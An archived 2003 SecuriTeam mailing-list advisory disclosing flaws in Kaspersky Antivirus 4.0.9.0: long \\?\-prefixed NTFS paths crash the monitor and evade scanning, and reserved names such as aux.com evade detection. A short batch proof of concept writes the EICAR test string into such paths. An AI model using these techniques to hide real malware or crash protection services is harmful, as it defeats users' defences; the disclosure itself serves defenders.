[NT] Kaspersky Antivirus DoS (Long Path, AUX)
From: support@securiteam.com
Date: 02/15/03
- Previous message: support@securiteam.com: "[TOOL] YAPH - Yet Another Proxy Hunter"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 15 Feb 2003 21:48:18 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -
Kaspersky Antivirus DoS (Long Path, AUX)
------------------------------------------------------------------------
SUMMARY
<http://www.kaspersky.com/> Kaspersky Antivirus (KAV) is a family of
antiviral products.
A few vulnerabilities were identified in their products, the most serious
one allows user to crash antiviral server remotely (write access to any
directory on remote server is required).
1. Long path crash
2. Long path prevents malware from detection
3. Special name prevents malware from detection
DETAILS
Vulnerable systems:
* Kaspersky Antivirus version 4.0.9.0
1. Long path crash
NTFS file system allows creating paths of almost unlimited length.
However, Windows API does not allow path longer than 256 bytes. To prevent
Windows API from checking requested path \\?\ prefix may be used to
filename. This is documented feature of Windows API. Paths longer than 256
characters will cause KAV monitor service to crash or hang with 100% CPU
usage. Possibility of code execution is not researched.
2. Long path prevents malware from detection
Long path will also prevent malware from detection by antiviral scanner.
3. Special name prevents malware from detection
It is possible to create NTFS file with name like aux.vbs or aux.com.
Malware in this file will not be detected.
Exploit:
This .bat file demonstrates vulnerability.
1,2 Long path crash & Long path prevents malware from detection
@echo off
SET
A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%\%A%
echo
X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*>\\?\c:\%A%\%A%\%A%\%A%\%A%\%A%\%A%.com
3. Special name prevents malware from detection
echo
X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*>\\?\c:\aux.com
ADDITIONAL INFORMATION
The information has been provided by <mailto:3APA3A@SECURITY.NNOV.RU>
ZARAZA.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Next message: support@securiteam.com: "[EXPL] RealServer 8 Remote Buffer Overflow Vulnerability (Exploit, SETUP, RTSP)"
- Previous message: support@securiteam.com: "[TOOL] YAPH - Yet Another Proxy Hunter"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
